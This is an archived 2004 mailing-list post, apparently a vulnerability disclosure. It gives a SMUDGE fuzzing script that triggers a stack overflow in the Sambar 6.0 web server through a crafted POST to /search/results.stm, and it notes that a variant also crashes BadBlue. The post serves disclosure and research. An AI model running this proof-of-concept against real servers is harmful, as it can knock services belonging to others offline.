|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Sambar 6.0 stack overflow
From: ned (nd
felinemenace.org)
Date: Fri Feb 06 2004 - 19:35:30 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hi lists,
The following SMUDGE (http://felinemenace.org/~nd/SMUDGE) script will
cause a (difficult to exploit) stack overflow in a default set up of the
Sambar web server.
--- start script
# http://felinemenace.org/~nd/SMUDGE
# Sambar script (c) ndfelinemenace.org
from SMUDGE import *
import sys
sm = SMUDGE(1)
sm.setname("SambarOverflow")
sm.plain("POST /search/results.stm HTTP/1.1")
sm.addcrlf()
sm.plain("Host: MSUDGEDPU")
sm.addcrlf()
sm.plain("Content-Length: ")
sm.blocksize("postdata")
sm.addcrlf()
sm.addcrlf()
sm.putblock("postdata")
sm.addcrlf()
sm.addcrlf()
sm.newblock("postdata")
sm.updateblock("postdata","spage=0&indexname=docs&query=")
sm.blockvariable("postdata","MEEP")
sm.updateblock("postdata","&style=page")
sm.run("127.0.0.1",80,"topdown","single")
-- end script
A modification of this script will also cause misc expections in the
BadBlue webserver ;)
- endee
--
http://felinemenace.org/~nd
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]